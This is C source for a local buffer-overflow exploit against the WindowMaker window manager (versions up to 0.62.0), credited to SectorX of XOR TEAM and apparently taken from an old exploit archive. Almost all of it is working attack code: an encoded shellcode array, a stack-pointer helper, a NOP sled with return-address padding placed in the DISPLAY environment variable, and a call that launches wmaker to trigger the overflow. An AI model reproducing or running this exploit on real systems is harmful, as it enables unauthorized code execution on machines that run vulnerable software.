/*
 
               WindowMaker <= 0.62.0 (and maybe newer) overflow
                          by SectorX of XOR TEAM
  
  for more information please refer to XOR TEAM's homepage at http://xorteam.cjb.net
  note: i supplied the offset 0x4 since it worked for me, but it most likely
  wont work for you since my WindowMaker code is modified and self compiled.
  if you find an offset on any precompiled binaries please let me know, thanx.
 
*/
#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define LEN 1004
#define OFFSET 0x4

char shellcode[] =
  "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
  "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
  "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
  "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
  "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
  "\xc2\x91";

long get_sp()
{
  __asm__("mov %esp, %eax");
}

int main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;
  long stack = get_sp ();
  int offset;

  fprintf(stderr, "WindowMaker overflow by SectorX\n\n");
  offset = OFFSET;
  if (argc > 1)
    offset = atoi(argv[1]);
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = stack + offset;
  for (i = 0; i < (LEN - strlen (shellcode) - 50); i++)
    *(buffer + i) = NOP;
  memcpy (buffer + i, shellcode, strlen (shellcode));
  printf("Using address 0x%x, offset = 0x%x\n",stack+offset,offset);
  printf("Setting environment variable ... ");
  setenv("DISPLAY",buffer,1);
  printf("done\n\n");
  system("/usr/local/bin/wmaker");
  return 0;
}
/*                    www.hack.co.za              [2000]*/